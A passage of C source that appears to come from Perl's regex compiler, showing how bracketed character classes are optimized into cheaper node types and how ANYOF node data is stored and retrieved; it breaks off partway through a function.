PERL_UINT_FAST8_T i;
Size_t partial_cp_count = 0;
UV start[MAX_FOLD_FROMS+1] = { 0 }; /* +1 for the folded-to char */
UV end[MAX_FOLD_FROMS+1] = { 0 };
if (cp_list) { /* Count the code points in enough ranges that we would
see all the ones possible in any fold in this version
of Unicode */
invlist_iterinit(cp_list);
for (i = 0; i <= MAX_FOLD_FROMS; i++) {
if (! invlist_iternext(cp_list, &start[i], &end[i])) {
break;
}
partial_cp_count += end[i] - start[i] + 1;
}
invlist_iterfinish(cp_list);
}
/* If we know at compile time that this matches every possible code
* point, any run-time dependencies don't matter */
if (start[0] == 0 && end[0] == UV_MAX) {
if (invert) {
ret = reganode(pRExC_state, OPFAIL, 0);
}
else {
ret = reg_node(pRExC_state, SANY);
MARK_NAUGHTY(1);
}
goto not_anyof;
}
/* Similarly, for /l posix classes, if both a class and its
* complement match, any run-time dependencies don't matter */
if (posixl) {
for (namedclass = 0; namedclass < ANYOF_POSIXL_MAX;
namedclass += 2)
{
if ( POSIXL_TEST(posixl, namedclass) /* class */
&& POSIXL_TEST(posixl, namedclass + 1)) /* its complement */
{
if (invert) {
ret = reganode(pRExC_state, OPFAIL, 0);
}
else {
ret = reg_node(pRExC_state, SANY);
MARK_NAUGHTY(1);
}
goto not_anyof;
}
}
/* For well-behaved locales, some classes are subsets of others,
* so complementing the subset and including the non-complemented
* superset should match everything, like [\D[:alnum:]], and
* [[:^alpha:][:alnum:]], but some implementations of locales are
* buggy, and khw thinks it's a bad idea to have optimization change
* behavior, even if it avoids an OS bug in a given case */
#define isSINGLE_BIT_SET(n) isPOWER_OF_2(n)
/* If is a single posix /l class, can optimize to just that op.
* Such a node will not match anything in the Latin1 range, as that
* is not determinable until runtime, but will match whatever the
* class does outside that range. (Note that some classes won't
* match anything outside the range, like [:ascii:]) */
if ( isSINGLE_BIT_SET(posixl)
&& (partial_cp_count == 0 || start[0] > 255))
{
U8 classnum;
SV * class_above_latin1 = NULL;
bool already_inverted;
bool are_equivalent;
/* Compute which bit is set, which is the same thing as, e.g.,
* ANYOF_CNTRL. From
* https://graphics.stanford.edu/~seander/bithacks.html#IntegerLogDeBruijn
* */
static const int MultiplyDeBruijnBitPosition2[32] =
{
0, 1, 28, 2, 29, 14, 24, 3, 30, 22, 20, 15, 25, 17, 4, 8,
31, 27, 13, 23, 21, 19, 16, 7, 26, 12, 18, 6, 11, 5, 10, 9
};
namedclass = MultiplyDeBruijnBitPosition2[(posixl
* 0x077CB531U) >> 27];
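/* (Worked example: if only bit 4 of 'posixl' is set, posixl == 0x10,
* 0x10 * 0x077CB531 == 0x77CB5310, whose top 5 bits are 14, and
* MultiplyDeBruijnBitPosition2[14] == 4, recovering the bit position.) */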
classnum = namedclass_to_classnum(namedclass);
/* The named classes are such that the inverted number is one
* larger than the non-inverted one */
already_inverted = namedclass
- classnum_to_namedclass(classnum);
/* Create an inversion list of the official property, inverted
* if the constructed node list is inverted, and restricted to
* only the above latin1 code points, which are the only ones
* known at compile time */
_invlist_intersection_maybe_complement_2nd(
PL_AboveLatin1,
PL_XPosix_ptrs[classnum],
already_inverted,
&class_above_latin1);
are_equivalent = _invlistEQ(class_above_latin1, cp_list,
FALSE);
SvREFCNT_dec_NN(class_above_latin1);
if (are_equivalent) {
/* Resolve the run-time inversion flag with this possibly
* inverted class */
invert = invert ^ already_inverted;
ret = reg_node(pRExC_state,
POSIXL + invert * (NPOSIXL - POSIXL));
FLAGS(REGNODE_p(ret)) = classnum;
goto not_anyof;
}
}
}
/* khw can't think of any other possible transformation involving
* these. */
if (has_runtime_dependency & HAS_USER_DEFINED_PROPERTY) {
goto is_anyof;
}
if (! has_runtime_dependency) {
/* If the list is empty, nothing matches. This happens, for
* example, when a Unicode property that doesn't match anything is
* the only element in the character class (perluniprops.pod notes
* such properties). */
if (partial_cp_count == 0) {
if (invert) {
ret = reg_node(pRExC_state, SANY);
}
else {
ret = reganode(pRExC_state, OPFAIL, 0);
}
goto not_anyof;
}
/* If matches everything but \n */
if ( start[0] == 0 && end[0] == '\n' - 1
&& start[1] == '\n' + 1 && end[1] == UV_MAX)
{
assert (! invert);
ret = reg_node(pRExC_state, REG_ANY);
MARK_NAUGHTY(1);
goto not_anyof;
}
}
/* Next see if can optimize classes that contain just a few code points
* into an EXACTish node. The reason to do this is to let the
* optimizer join this node with adjacent EXACTish ones.
*
* An EXACTFish node can be generated even if not under /i, and vice
* versa. But care must be taken. An EXACTFish node has to be such
* that it only matches precisely the code points in the class, but we
* want to generate the least restrictive one that does that, to
* increase the odds of being able to join with an adjacent node. For
* example, if the class contains [kK], we have to make it an EXACTFAA
* node to prevent the KELVIN SIGN from matching. Whether we are under
* /i or not is irrelevant in this case. Less obvious is the pattern
* qr/[\x{02BC}]n/i. U+02BC is MODIFIER LETTER APOSTROPHE. That is
* supposed to match the single character U+0149 LATIN SMALL LETTER N
* PRECEDED BY APOSTROPHE. And so even though there is no simple fold
* that includes \x{02BC}, there is a multi-char fold that does, and so
* the node generated for it must be an EXACTFish one. On the other
* hand qr/:/i should generate a plain EXACT node since the colon
* participates in no fold whatsoever, and having it EXACT tells the
* optimizer the target string cannot match unless it has a colon in
* it.
*
* We don't typically generate an EXACTish node if doing so would
* require changing the pattern to UTF-8, as that affects /d and
* otherwise is slower. However, under /i, not changing to UTF-8 can
* miss some potential multi-character folds. We calculate the
* EXACTish node, and then decide if something would be missed if we
* don't upgrade */
if ( ! posixl
&& ! invert
/* Only try if there are no more code points in the class than
* in the max possible fold */
&& partial_cp_count > 0 && partial_cp_count <= MAX_FOLD_FROMS + 1
&& (start[0] < 256 || UTF || FOLD))
{
if (partial_cp_count == 1 && ! upper_latin1_only_utf8_matches)
{
/* We can always make a single code point class into an
* EXACTish node. */
if (LOC) {
/* Here is /l: Use EXACTL, except /li indicates EXACTFL,
* as that means there is a fold not known until runtime, so it
* shows up as only a single code point here. */
op = (FOLD) ? EXACTFL : EXACTL;
}
else if (! FOLD) { /* Not /l and not /i */
op = (start[0] < 256) ? EXACT : EXACT_ONLY8;
}
else if (start[0] < 256) { /* /i, not /l, and the code point is
small */
/* Under /i, it gets a little tricky. A code point that
* doesn't participate in a fold should be an EXACT node.
* We know this one isn't the result of a simple fold, or
* there'd be more than one code point in the list, but it
* could be part of a multi- character fold. In that case
* we better not create an EXACT node, as we would wrongly
* be telling the optimizer that this code point must be in
* the target string, and that is wrong. This is because
* if the sequence around this code point forms a
* multi-char fold, what needs to be in the string could be
* the code point that folds to the sequence.
*
* This handles the case of below-255 code points, as we
* have an easy look up for those. The next clause handles
* the above-256 one */
op = IS_IN_SOME_FOLD_L1(start[0])
? EXACTFU
: EXACT;
}
else { /* /i, larger code point. Since we are under /i, and
have just this code point, we know that it can't
fold to something else, so PL_InMultiCharFold
applies to it */
op = _invlist_contains_cp(PL_InMultiCharFold,
start[0])
? EXACTFU_ONLY8
: EXACT_ONLY8;
}
value = start[0];
}
else if ( ! (has_runtime_dependency & ~HAS_D_RUNTIME_DEPENDENCY)
&& _invlist_contains_cp(PL_in_some_fold, start[0]))
{
/* Here, the only runtime dependency, if any, is from /d, and
* the class matches more than one code point, and the lowest
* code point participates in some fold. It might be that the
* other code points are /i equivalent to this one, and hence
* they would be representable by an EXACTFish node. Above, we
* eliminated classes that contain too many code points to be
* EXACTFish, with the test for MAX_FOLD_FROMS
*
* First, special case the ASCII fold pairs, like 'B' and 'b'.
* We do this because we have EXACTFAA at our disposal for the
* ASCII range */
if (partial_cp_count == 2 && isASCII(start[0])) {
/* The only ASCII characters that participate in folds are
* alphabetics */
assert(isALPHA(start[0]));
if ( end[0] == start[0] /* First range is a single
character, so 2nd exists */
&& isALPHA_FOLD_EQ(start[0], start[1]))
{
/* Here, is part of an ASCII fold pair */
if ( ASCII_FOLD_RESTRICTED
|| HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(start[0]))
{
/* If the second clause just above was true, it
* means we can't be under /i, or else the list
* would have included more than this fold pair.
* Therefore we have to exclude the possibility of
* whatever else it is that folds to these, by
* using EXACTFAA */
op = EXACTFAA;
}
else if (HAS_NONLATIN1_FOLD_CLOSURE(start[0])) {
/* Here, there's no simple fold that start[0] is part
* of, but there is a multi-character one. If we
* are not under /i, we want to exclude that
* possibility; if under /i, we want to include it
* */
op = (FOLD) ? EXACTFU : EXACTFAA;
}
else {
/* Here, the only possible fold start[0] participates in
* is with start[1]. /i or not isn't relevant */
op = EXACTFU;
}
value = toFOLD(start[0]);
}
}
else if ( ! upper_latin1_only_utf8_matches
|| ( _invlist_len(upper_latin1_only_utf8_matches)
== 2
&& PL_fold_latin1[
invlist_highest(upper_latin1_only_utf8_matches)]
== start[0]))
{
/* Here, the smallest character is non-ascii or there are
* more than 2 code points matched by this node. Also, we
* either don't have /d UTF-8 dependent matches, or if we
* do, they look like they could be a single character that
* is the fold of the lowest one in the always-match list.
* This test quickly excludes most of the false positives
* when there are /d UTF-8 dependent matches. These are
* like LATIN CAPITAL LETTER A WITH GRAVE matching LATIN
* SMALL LETTER A WITH GRAVE iff the target string is
* UTF-8. (We don't have to worry above about exceeding
* the array bounds of PL_fold_latin1[] because any code
* point in 'upper_latin1_only_utf8_matches' is below 256.)
*
* EXACTFAA would apply only to pairs (hence exactly 2 code
* points) in the ASCII range, so we can't use it here to
* artificially restrict the fold domain, so we check if
* the class does or does not match some EXACTFish node.
* Further, if we aren't under /i, and the folded-to
* character is part of a multi-character fold, we can't do
* this optimization, as the sequence around it could be
* that multi-character fold, and we don't here know the
* context, so we have to assume it is that multi-char
* fold, to prevent potential bugs.
*
* To do the general case, we first find the fold of the
* lowest code point (which may be higher than the lowest
* one), then find everything that folds to it. (The data
* structure we have only maps from the folded code points,
* so we have to do the earlier step.) */
Size_t foldlen;
U8 foldbuf[UTF8_MAXBYTES_CASE];
UV folded = _to_uni_fold_flags(start[0],
foldbuf, &foldlen, 0);
unsigned int first_fold;
const unsigned int * remaining_folds;
Size_t folds_to_this_cp_count = _inverse_folds(
folded,
&first_fold,
&remaining_folds);
Size_t folds_count = folds_to_this_cp_count + 1;
SV * fold_list = _new_invlist(folds_count);
unsigned int i;
/* If there are UTF-8 dependent matches, create a temporary
* list of what this node matches, including them. */
SV * all_cp_list = NULL;
SV ** use_this_list = &cp_list;
if (upper_latin1_only_utf8_matches) {
all_cp_list = _new_invlist(0);
use_this_list = &all_cp_list;
_invlist_union(cp_list,
upper_latin1_only_utf8_matches,
use_this_list);
}
/* Having gotten everything that participates in the fold
* containing the lowest code point, we turn that into an
* inversion list, making sure everything is included. */
fold_list = add_cp_to_invlist(fold_list, start[0]);
fold_list = add_cp_to_invlist(fold_list, folded);
if (folds_to_this_cp_count > 0) {
fold_list = add_cp_to_invlist(fold_list, first_fold);
for (i = 0; i + 1 < folds_to_this_cp_count; i++) {
fold_list = add_cp_to_invlist(fold_list,
remaining_folds[i]);
}
}
/* If the fold list is identical to what's in this ANYOF
* node, the node can be represented by an EXACTFish one
* instead */
if (_invlistEQ(*use_this_list, fold_list,
0 /* Don't complement */ )
) {
/* But, we have to be careful, as mentioned above.
* Just the right sequence of characters could match
* this if it is part of a multi-character fold. That
* IS what we want if we are under /i. But it ISN'T
* what we want if not under /i, as it could match when
* it shouldn't. So, when we aren't under /i and this
* character participates in a multi-char fold, we
* don't optimize into an EXACTFish node. So, for each
* case below we have to check if we are folding
* and if not, if it is not part of a multi-char fold.
* */
if (start[0] > 255) { /* Highish code point */
if (FOLD || ! _invlist_contains_cp(
PL_InMultiCharFold, folded))
{
op = (LOC)
? EXACTFLU8
: (ASCII_FOLD_RESTRICTED)
? EXACTFAA
: EXACTFU_ONLY8;
value = folded;
}
} /* Below, the lowest code point < 256 */
else if ( FOLD
&& folded == 's'
&& DEPENDS_SEMANTICS)
{ /* An EXACTF node containing a single character
's', can be an EXACTFU if it doesn't get
joined with an adjacent 's' */
op = EXACTFU_S_EDGE;
value = folded;
}
else if ( FOLD
|| ! HAS_NONLATIN1_FOLD_CLOSURE(start[0]))
{
if (upper_latin1_only_utf8_matches) {
op = EXACTF;
/* We can't use the fold, as that only matches
* under UTF-8 */
value = start[0];
}
else if ( UNLIKELY(start[0] == MICRO_SIGN)
&& ! UTF)
{ /* EXACTFUP is a special node for this
character */
op = (ASCII_FOLD_RESTRICTED)
? EXACTFAA
: EXACTFUP;
value = MICRO_SIGN;
}
else if ( ASCII_FOLD_RESTRICTED
&& ! isASCII(start[0]))
{ /* Non-ASCII under /iaa must use EXACTFAA; the
ASCII case is handled by the EXACTFU branch below */
op = EXACTFAA;
value = folded;
}
else {
op = EXACTFU;
value = folded;
}
}
}
SvREFCNT_dec_NN(fold_list);
SvREFCNT_dec(all_cp_list);
}
}
if (op != END) {
/* Here, we have calculated what EXACTish node we would use.
* But we don't use it if it would require converting the
* pattern to UTF-8, unless not using it could cause us to miss
* some folds (hence be buggy) */
if (! UTF && value > 255) {
SV * in_multis = NULL;
assert(FOLD);
/* If there is no code point that is part of a multi-char
* fold, then there aren't any matches, so we don't do this
* optimization. Otherwise, it could match depending on
* the context around us, so we do upgrade */
_invlist_intersection(PL_InMultiCharFold, cp_list, &in_multis);
if (UNLIKELY(_invlist_len(in_multis) != 0)) {
REQUIRE_UTF8(flagp);
}
else {
op = END;
}
}
if (op != END) {
U8 len = (UTF) ? UVCHR_SKIP(value) : 1;
ret = regnode_guts(pRExC_state, op, len, "exact");
FILL_NODE(ret, op);
RExC_emit += 1 + STR_SZ(len);
STR_LEN(REGNODE_p(ret)) = len;
if (len == 1) {
*STRING(REGNODE_p(ret)) = (U8) value;
}
else {
uvchr_to_utf8((U8 *) STRING(REGNODE_p(ret)), value);
}
goto not_anyof;
}
}
}
if (! has_runtime_dependency) {
/* See if this can be turned into an ANYOFM node. Think about the
* bit patterns in two different bytes. In some positions, the
* bits in each will be 1; and in other positions both will be 0;
* and in some positions the bit will be 1 in one byte, and 0 in
* the other. Let 'n' be the number of positions where the bits
* differ. We create a mask which has exactly 'n' 0 bits, each in
* a position where the two bytes differ. Now take the set of all
* bytes that when ANDed with the mask yield the same result. That
* set has 2**n elements, and is representable by just two 8 bit
* numbers: the result and the mask. Importantly, matching the set
* can be vectorized by creating a word full of the result bytes,
* and a word full of the mask bytes, yielding a significant speed
* up. Here, see if this node matches such a set. As a concrete
* example consider [01], and the byte representing '0' which is
* 0x30 on ASCII machines. It has the bits 0011 0000. Take the
* mask 1111 1110. If we AND 0x31 and 0x30 with that mask we get
* 0x30. Any other bytes ANDed yield something else. So [01],
* which is a common usage, is optimizable into ANYOFM, and can
* benefit from the speed up. We can only do this on UTF-8
* invariant bytes, because they have the same bit patterns under
* UTF-8 as not. */
PERL_UINT_FAST8_T inverted = 0;
#ifdef EBCDIC
const PERL_UINT_FAST8_T max_permissible = 0xFF;
#else
const PERL_UINT_FAST8_T max_permissible = 0x7F;
#endif
/* If doesn't fit the criteria for ANYOFM, invert and try again.
* If that works we will instead later generate an NANYOFM, and
* invert back when through */
if (invlist_highest(cp_list) > max_permissible) {
_invlist_invert(cp_list);
inverted = 1;
}
if (invlist_highest(cp_list) <= max_permissible) {
UV this_start, this_end;
UV lowest_cp = UV_MAX; /* inited to suppress compiler warn */
U8 bits_differing = 0;
Size_t full_cp_count = 0;
bool first_time = TRUE;
/* Go through the bytes and find the bit positions that differ
* */
invlist_iterinit(cp_list);
while (invlist_iternext(cp_list, &this_start, &this_end)) {
unsigned int i = this_start;
if (first_time) {
if (! UVCHR_IS_INVARIANT(i)) {
goto done_anyofm;
}
first_time = FALSE;
lowest_cp = this_start;
/* We have set up the code point to compare with.
* Don't compare it with itself */
i++;
}
/* Find the bit positions that differ from the lowest code
* point in the node. Keep track of all such positions by
* OR'ing */
for (; i <= this_end; i++) {
if (! UVCHR_IS_INVARIANT(i)) {
goto done_anyofm;
}
bits_differing |= i ^ lowest_cp;
}
full_cp_count += this_end - this_start + 1;
}
invlist_iterfinish(cp_list);
/* At the end of the loop, we count how many bits differ from
* the bits in lowest code point, call the count 'd'. If the
* set we found contains 2**d elements, it is the closure of
* all code points that differ only in those bit positions. To
* convince yourself of that, first note that the number in the
* closure must be a power of 2, which we test for. The only
* way we could have that count and it be some differing set,
* is if we got some code points that don't differ from the
* lowest code point in any position, but do differ from each
* other in some other position. That means one code point has
* a 1 in that position, and another has a 0. But that would
* mean that one of them differs from the lowest code point in
* that position, which possibility we've already excluded. */
if ( (inverted || full_cp_count > 1)
&& full_cp_count == 1U << PL_bitcount[bits_differing])
{
U8 ANYOFM_mask;
op = ANYOFM + inverted;
/* We need to make the bits that differ be 0's */
ANYOFM_mask = ~ bits_differing; /* This goes into FLAGS */
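/* (Continuing the [01] example from the comment above: lowest_cp is
* 0x30, bits_differing is 0x01, so the stored mask is 0xFE.) */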
/* The argument is the lowest code point */
ret = reganode(pRExC_state, op, lowest_cp);
FLAGS(REGNODE_p(ret)) = ANYOFM_mask;
}
}
done_anyofm:
if (inverted) {
_invlist_invert(cp_list);
}
if (op != END) {
goto not_anyof;
}
}
if (! (anyof_flags & ANYOF_LOCALE_FLAGS)) {
PERL_UINT_FAST8_T type;
SV * intersection = NULL;
SV* d_invlist = NULL;
/* See if this matches any of the POSIX classes. The POSIXA and
* POSIXD ones are about the same speed as ANYOF ops, but take less
* room; the ones that have above-Latin1 code point matches are
* somewhat faster than ANYOF. */
for (type = POSIXA; type >= POSIXD; type--) {
int posix_class;
if (type == POSIXL) { /* But not /l posix classes */
continue;
}
for (posix_class = 0;
posix_class <= _HIGHEST_REGCOMP_DOT_H_SYNC;
posix_class++)
{
SV** our_code_points = &cp_list;
SV** official_code_points;
int try_inverted;
if (type == POSIXA) {
official_code_points = &PL_Posix_ptrs[posix_class];
}
else {
official_code_points = &PL_XPosix_ptrs[posix_class];
}
/* Skip non-existent classes of this type. e.g. \v only
* has an entry in PL_XPosix_ptrs */
if (! *official_code_points) {
continue;
}
/* Try both the regular class, and its inversion */
for (try_inverted = 0; try_inverted < 2; try_inverted++) {
bool this_inverted = invert ^ try_inverted;
if (type != POSIXD) {
/* This class that isn't /d can't match if we have
* /d dependencies */
if (has_runtime_dependency
& HAS_D_RUNTIME_DEPENDENCY)
{
continue;
}
}
else /* is /d */ if (! this_inverted) {
/* /d classes don't match anything non-ASCII below
* 256 unconditionally (which cp_list contains) */
_invlist_intersection(cp_list, PL_UpperLatin1,
&intersection);
if (_invlist_len(intersection) != 0) {
continue;
}
SvREFCNT_dec(d_invlist);
d_invlist = invlist_clone(cp_list, NULL);
/* But under UTF-8 it turns into using /u rules.
* Add the things it matches under these conditions
* so that we check below that these are identical
* to what the tested class should match */
if (upper_latin1_only_utf8_matches) {
_invlist_union(
d_invlist,
upper_latin1_only_utf8_matches,
&d_invlist);
}
our_code_points = &d_invlist;
}
else { /* POSIXD, inverted. If this doesn't have this
flag set, it isn't /d. */
if (! (anyof_flags & ANYOF_SHARED_d_MATCHES_ALL_NON_UTF8_NON_ASCII_non_d_WARN_SUPER))
{
continue;
}
our_code_points = &cp_list;
}
/* Here, have weeded out some things. We want to see
* if the list of characters this node contains
* ('*our_code_points') precisely matches those of the
* class we are currently checking against
* ('*official_code_points'). */
if (_invlistEQ(*our_code_points,
*official_code_points,
try_inverted))
{
/* Here, they precisely match. Optimize this ANYOF
* node into its equivalent POSIX one of the
* correct type, possibly inverted */
ret = reg_node(pRExC_state, (try_inverted)
? type + NPOSIXA
- POSIXA
: type);
FLAGS(REGNODE_p(ret)) = posix_class;
SvREFCNT_dec(d_invlist);
SvREFCNT_dec(intersection);
goto not_anyof;
}
}
}
}
SvREFCNT_dec(d_invlist);
SvREFCNT_dec(intersection);
}
/* If didn't find an optimization and there is no need for a
* bitmap, optimize to indicate that */
if ( start[0] >= NUM_ANYOF_CODE_POINTS
&& ! LOC
&& ! upper_latin1_only_utf8_matches
&& anyof_flags == 0)
{
UV highest_cp = invlist_highest(cp_list);
/* If the lowest and highest code point in the class have the same
* UTF-8 first byte, then all do, and we can store that byte for
* regexec.c to use so that it can more quickly scan the target
* string for potential matches for this class. We co-opt the
* flags field for this. Zero means, they don't have the same
* first byte. We do accept here very large code points (for
* future use), but don't bother with this optimization for them,
* as it would cause other complications */
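/* (For example, on ASCII platforms a class confined to U+0800..U+0FFF
* has every UTF-8 representation beginning with the byte 0xE0, so 0xE0
* would be stored here.) */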
if (highest_cp > IV_MAX) {
anyof_flags = 0;
}
else {
U8 low_utf8[UTF8_MAXBYTES+1];
U8 high_utf8[UTF8_MAXBYTES+1];
(void) uvchr_to_utf8(low_utf8, start[0]);
(void) uvchr_to_utf8(high_utf8, invlist_highest(cp_list));
anyof_flags = (low_utf8[0] == high_utf8[0])
? low_utf8[0]
: 0;
}
op = ANYOFH;
}
} /* End of seeing if can optimize it into a different node */
is_anyof: /* It's going to be an ANYOF node. */
if (op != ANYOFH) {
op = (has_runtime_dependency & HAS_D_RUNTIME_DEPENDENCY)
? ANYOFD
: ((posixl)
? ANYOFPOSIXL
: ((LOC)
? ANYOFL
: ANYOF));
}
ret = regnode_guts(pRExC_state, op, regarglen[op], "anyof");
FILL_NODE(ret, op); /* We set the argument later */
RExC_emit += 1 + regarglen[op];
ANYOF_FLAGS(REGNODE_p(ret)) = anyof_flags;
/* Here, <cp_list> contains all the code points we can determine at
* compile time that match under all conditions. Go through it, and
* for things that belong in the bitmap, put them there, and delete from
* <cp_list>. While we are at it, see if everything above 255 is in the
* list, and if so, set a flag to speed up execution */
populate_ANYOF_from_invlist(REGNODE_p(ret), &cp_list);
if (posixl) {
ANYOF_POSIXL_SET_TO_BITMAP(REGNODE_p(ret), posixl);
}
if (invert) {
ANYOF_FLAGS(REGNODE_p(ret)) |= ANYOF_INVERT;
}
/* Here, the bitmap has been populated with all the Latin1 code points that
* always match. Can now add to the overall list those that match only
* when the target string is UTF-8 (<upper_latin1_only_utf8_matches>).
* */
if (upper_latin1_only_utf8_matches) {
if (cp_list) {
_invlist_union(cp_list,
upper_latin1_only_utf8_matches,
&cp_list);
SvREFCNT_dec_NN(upper_latin1_only_utf8_matches);
}
else {
cp_list = upper_latin1_only_utf8_matches;
}
ANYOF_FLAGS(REGNODE_p(ret)) |= ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP;
}
set_ANYOF_arg(pRExC_state, REGNODE_p(ret), cp_list,
(HAS_NONLOCALE_RUNTIME_PROPERTY_DEFINITION)
? listsv : NULL,
only_utf8_locale_list);
return ret;
not_anyof:
/* Here, the node is getting optimized into something that's not an ANYOF
* one. Finish up. */
Set_Node_Offset_Length(REGNODE_p(ret), orig_parse - RExC_start,
RExC_parse - orig_parse);
SvREFCNT_dec(cp_list);
return ret;
}
#undef HAS_NONLOCALE_RUNTIME_PROPERTY_DEFINITION
STATIC void
S_set_ANYOF_arg(pTHX_ RExC_state_t* const pRExC_state,
regnode* const node,
SV* const cp_list,
SV* const runtime_defns,
SV* const only_utf8_locale_list)
{
/* Sets the arg field of an ANYOF-type node 'node', using information about
* the node passed-in. If there is nothing outside the node's bitmap, the
* arg is set to ANYOF_ONLY_HAS_BITMAP. Otherwise, it sets the argument to
* the count returned by add_data(), having allocated and stored an array,
* av, as follows:
*
* av[0] stores the inversion list defining this class as far as known at
* this time, or PL_sv_undef if nothing definite is now known.
* av[1] stores the inversion list of code points that match only if the
* current locale is UTF-8, or if none, PL_sv_undef if there is an
* av[2], or no entry otherwise.
* av[2] stores the list of user-defined properties whose subroutine
* definitions aren't known at this time, or no entry if none. */
UV n;
PERL_ARGS_ASSERT_SET_ANYOF_ARG;
if (! cp_list && ! runtime_defns && ! only_utf8_locale_list) {
assert(! (ANYOF_FLAGS(node)
& ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP));
ARG_SET(node, ANYOF_ONLY_HAS_BITMAP);
}
else {
AV * const av = newAV();
SV *rv;
if (cp_list) {
av_store(av, INVLIST_INDEX, cp_list);
}
if (only_utf8_locale_list) {
av_store(av, ONLY_LOCALE_MATCHES_INDEX, only_utf8_locale_list);
}
if (runtime_defns) {
av_store(av, DEFERRED_USER_DEFINED_INDEX, SvREFCNT_inc(runtime_defns));
}
rv = newRV_noinc(MUTABLE_SV(av));
n = add_data(pRExC_state, STR_WITH_LEN("s"));
RExC_rxi->data->data[n] = (void*)rv;
ARG_SET(node, n);
}
}
#if !defined(PERL_IN_XSUB_RE) || defined(PLUGGABLE_RE_EXTENSION)
SV *
Perl__get_regclass_nonbitmap_data(pTHX_ const regexp *prog,
const regnode* node,
bool doinit,
SV** listsvp,
SV** only_utf8_locale_ptr,
SV** output_invlist)
{
/* For internal core use only.
* Returns the inversion list for the input 'node' in the regex 'prog'.
* If <doinit> is 'true', will attempt to create the inversion list if not
* already done.
* If <listsvp> is non-null, will return the printable contents of the
* property definition. This can be used to get debugging information
* even before the inversion list exists, by calling this function with
* 'doinit' set to false, in which case the components that will be used
* to eventually create the inversion list are returned (in a printable
* form).
* If <only_utf8_locale_ptr> is not NULL, it is where this routine is to
* store an inversion list of code points that should match only if the
* execution-time locale is a UTF-8 one.
* If <output_invlist> is not NULL, it is where this routine is to store an
* inversion list of the code points that would be instead returned in
* <listsvp> if this were NULL. Thus, what gets output in <listsvp>
* when this parameter is used, is just the non-code point data that
* will go into creating the inversion list. This currently should be just
* user-defined properties whose definitions were not known at compile
* time. Using this parameter allows for easier manipulation of the
* inversion list's data by the caller. It is illegal to call this
* function with this parameter set, but not <listsvp>
*
* Tied intimately to how S_set_ANYOF_arg sets up the data structure. Note
* that, in spite of this function's name, the inversion list it returns
* may include the bitmap data as well */
SV *si = NULL; /* Input initialization string */
SV* invlist = NULL;
RXi_GET_DECL(prog, progi);
const struct reg_data * const data = prog ? progi->data : NULL;
PERL_ARGS_ASSERT__GET_REGCLASS_NONBITMAP_DATA;
assert(! output_invlist || listsvp);
if (data && data->count) {
const U32 n = ARG(node);
if (data->what[n] == 's') {
SV * const rv = MUTABLE_SV(data->data[n]);
AV * const av = MUTABLE_AV(SvRV(rv));
SV **const ary = AvARRAY(av);
invlist = ary[INVLIST_INDEX];
if (av_tindex_skip_len_mg(av) >= ONLY_LOCALE_MATCHES_INDEX) {
*only_utf8_locale_ptr = ary[ONLY_LOCALE_MATCHES_INDEX];
}
if (av_tindex_skip_len_mg(av) >= DEFERRED_USER_DEFINED_INDEX) {
si = ary[DEFERRED_USER_DEFINED_INDEX];
}
if (doinit && (si || invlist)) {
if (si) {
bool user_defined;
SV * msg = newSVpvs_flags("", SVs_TEMP);
SV * prop_definition = handle_user_defined_property(
"", 0, FALSE, /* There is no \p{}, \P{} */
SvPVX_const(si)[1] - '0', /* /i or not has been
stored here for just
this occasion */
TRUE, /* run time */
FALSE, /* This call must find the defn */
si, /* The property definition */
&user_defined,
msg,
0 /* base level call */
);
if (SvCUR(msg)) {
assert(prop_definition == NULL);
Perl_croak(aTHX_ "%" UTF8f,
UTF8fARG(SvUTF8(msg), SvCUR(msg), SvPVX(msg)));
}
if (invlist) {
_invlist_union(invlist, prop_definition, &invlist);
SvREFCNT_dec_NN(prop_definition);
}
else {
invlist = prop_definition;
}
STATIC_ASSERT_STMT(ONLY_LOCALE_MATCHES_INDEX == 1 + INVLIST_INDEX);
STATIC_ASSERT_STMT(DEFERRED_USER_DEFINED_INDEX == 1 + ONLY_LOCALE_MATCHES_INDEX);
av_store(av, INVLIST_INDEX, invlist);
av_fill(av, (ary[ONLY_LOCALE_MATCHES_INDEX])
? ONLY_LOCALE_MATCHES_INDEX:
INVLIST_INDEX);
si = NULL;
}
}
}
}
/* If requested, return a printable version of what this ANYOF node matches
* */
if (listsvp) {
SV* matches_string = NULL;
/* This function can be called at compile-time, before everything gets
* resolved, in which case we return the currently best available
* information, which is the string that will eventually be used to do
* that resolving, 'si' */
if (si) {
/* Here, we only have 'si' (and possibly some passed-in data in
* 'invlist', which is handled below). If the caller only wants
* 'si', use that. */
if (! output_invlist) {
matches_string = newSVsv(si);
}
else {
/* But if the caller wants an inversion list of the node, we
* need to parse 'si' and place as much as possible in the
* desired output inversion list, making 'matches_string' only
* contain the currently unresolvable things */
const char *si_string = SvPVX(si);
STRLEN remaining = SvCUR(si);
UV prev_cp = 0;
U8 count = 0;
/* Ignore everything before the first new-line */
while (*si_string != '\n' && remaining > 0) {
si_string++;
remaining--;
}
assert(remaining > 0);
si_string++;
remaining--;
while (remaining > 0) {
/* The data consists of just strings defining user-defined
* property names, but in prior incarnations, and perhaps
* somehow from pluggable regex engines, it could still
* hold hex code point definitions. Each component of a
* range would be separated by a tab, and each range by a
* new-line. If these are found, instead add them to the
* inversion list */
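/* (So a line of the form "30\t39\n" would contribute the range
* 0x30..0x39 to the output inversion list, while "1000\n" by itself
* would contribute just the single code point 0x1000.) */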
I32 grok_flags = PERL_SCAN_SILENT_ILLDIGIT
|PERL_SCAN_SILENT_NON_PORTABLE;
STRLEN len = remaining;
UV cp = grok_hex(si_string, &len, &grok_flags, NULL);
/* If the hex decode routine found something, it should go
* up to the next \n */
if ( *(si_string + len) == '\n') {
if (count) { /* 2nd code point on line */
*output_invlist = _add_range_to_invlist(*output_invlist, prev_cp, cp);
}
else {
*output_invlist = add_cp_to_invlist(*output_invlist, cp);
}
count = 0;
goto prepare_for_next_iteration;
}
/* If the hex decode was instead for the lower range limit,
* save it, and go parse the upper range limit */
if (*(si_string + len) == '\t') {
assert(count == 0);
prev_cp = cp;
count = 1;
prepare_for_next_iteration:
si_string += len + 1;
remaining -= len + 1;
continue;
}
/* Here, didn't find a legal hex number. Just add it from
* here to the next \n */
remaining -= len;
while (*(si_string + len) != '\n' && remaining > 0) {
remaining--;
len++;
}
if (*(si_string + len) == '\n') {
len++;
remaining--;
}
if (matches_string) {
